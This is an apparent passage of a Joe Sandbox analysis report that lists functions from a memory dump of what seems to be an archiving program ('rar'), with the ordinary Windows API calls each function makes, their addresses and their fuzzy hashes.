Part of subcall function 00007FF7CF897B44: GetStdHandle.KERNEL32(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B4A
Part of subcall function 00007FF7CF897B44: GetFileType.KERNELBASE(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B56
Part of subcall function 00007FF7CF897B44: GetConsoleMode.KERNEL32(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B69

Part of subcall function 00007FF7CF8E2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E2AD0

Part of subcall function 00007FF7CF8E2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E2C1C

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
Instruction ID: fed6d9be72ea50cb9bce99a080957e00245659e972c2766af022a856f75626a7
Opcode Fuzzy Hash: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
Instruction Fuzzy Hash: C5019008F191D206FE18BBB568A23F9A4C28F95330FC44278E52E4A2D7DD5C6965A371

Function 00007FF7CF8A2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF7CF8A2480
GetLastError.KERNEL32 ref: 00007FF7CF8A248D

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: 40129369940295ee7c75465c038cc898c7927df94bf3d25972d8e83edfb4f778
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 08016122A19AC296EB64AF29E4442F8A3A0EB44778F944331D63D411E5CF3CE596D770

Function 00007FF7CF8A30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF7CF8A305D,?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800), ref: 00007FF7CF8A30F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7CF8A3119

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: fd67e2e2bc92a940f51f25c61c09593dc6005de525dcf2d2a4543634cc26ed57
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: E0F0A931B186C185EB60AF64F8453E9A2D0FF4D7E4F800131EA9C87795DE6CD5945720

Function 00007FF7CF8CB3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF7CF8C7F72), ref: 00007FF7CF8CB41E
LoadLibraryExW.KERNELBASE ref: 00007FF7CF8CB449

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: 287e08a179b73ad4945feb7b064b15dafd2fb708c0892d3fa55f73d76261076f
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: BCF01821B1C5C185FA70AF51E8153F5A2A4BF5CB94FC04031E9CD82659DE2CD1549B70

Function 00007FF7CF8CBA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7CF8CBACD), ref: 00007FF7CF8CBA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF7CF8CBA87

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: 6f2063950212c2260a7a76dbdb184916e110bec8f0b4109cecc7e221ffd1152d
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: E8E0ED30B359914ADBE8AF198892FE9A3D0AB54B80FC02039E44A83A54ED2CC4549B20

Function 00007FF7CF8E4A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF7CF8E4A8A
GetLastError.KERNEL32 ref: 00007FF7CF8E4A9C

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: 466f7d92c7da7ca3179a5d8369334d6402a67b6aa691cc2c29a7d6881a595188
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction Fuzzy Hash: 83E08C68F192C346FF18BFF2A8052F492D06F58BB4FD84030D90D86292EE2CA4616234

Function 00007FF7CF8C71FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
Instruction ID: 0850cb0d14bdc7832aded48b767c754467e98f44bce6800dd999c65ebba7bd8b
Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
Instruction Fuzzy Hash: 98E1DC22A087C281FF20AE2194446FEA7D1EF41BA8FC44135DE4D4B69ADF2CA465E730

Function 00007FF7CF8872C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8B915C: new.LIBCMT ref: 00007FF7CF8B91CA
Part of subcall function 00007FF7CF8B915C: new.LIBCMT ref: 00007FF7CF8B91F2

new.LIBCMT ref: 00007FF7CF8873DE

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
Instruction ID: 10ad8f026e8c3683044d6038e04bec73075ff9ddbc507c3d0c366ff730ac86ef
Opcode Fuzzy Hash: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
Instruction Fuzzy Hash: 83512773518BD295E700AF24A8441ED77A8FB44F98F98423ADE880B79ADF395161D331

Function 00007FF7CF8E231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CF8E2344

Part of subcall function 00007FF7CF8E24D4: GetModuleHandleExW.KERNEL32 ref: 00007FF7CF8E24F4
Part of subcall function 00007FF7CF8E24D4: GetProcAddress.KERNEL32 ref: 00007FF7CF8E250A
Part of subcall function 00007FF7CF8E24D4: FreeLibrary.KERNEL32 ref: 00007FF7CF8E252F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 4ac4d0f03b4c7b143d5fb4bc0f519bca5c18b7fac937d103297e8450029beea9
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 9F41D329E096C387FB68BF1498503F8A3E1AFA0764F804435D90D476E5DE3DE858A770

Function 00007FF7CF894D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF7CF894D47

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: b68cbe98ef264fe739411877c3909bd6004c5f819ac4f6bbe52d90300a53cd28
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: CC01C41560D68289EA10FF16A4001FDA6E0AF85BB4F985431EE4D07369CE3DE6619330

Function 00007FF7CF8E4B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: fb4bc52db7f65b2b8368b14f9a176514226883dd0bbb55547ed8b27be5e4f28f
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: 92011A5CA0C6C244FA64BEA65A413FAE1D05F99BF4FD88231ED1D462D6ED2CE4216231

Function 00007FF7CF8CA924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF7CF8CA998

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: c5af0baa7acecb8ca71c561e00d880501e28f5c2f00c6ec207d27807b7a7d8f9
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: 7201DB6170C7D245EA107F03A4051AAE690BB59FD1FAC4434EFCD8BB5ACE3CD4524724

Function 00007FF7CF8A4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF7CF8A4590

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
Instruction ID: e9852dcb504144f720d84f8c1a66ea59cc6967f9f3a54d7ea87e24695c6f350f
Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
Instruction Fuzzy Hash: D9F06D21A092C186EF15AE6195012F8A690EB06BB8F684335DEBC0B2D7CE6990A49730

Function 00007FF7CF8E4AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7CF8E4AF2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: be5f9e35d76f2fa77cb1df3d5a6c4e96cb34db76536391b1209b3df29f96d081
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: 0EF0FE2DB4D2C245FE547EB258423F5A2C09F887B0FE80630ED2E863C1DE6CE8616134

Function 00007FF7CF8B38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

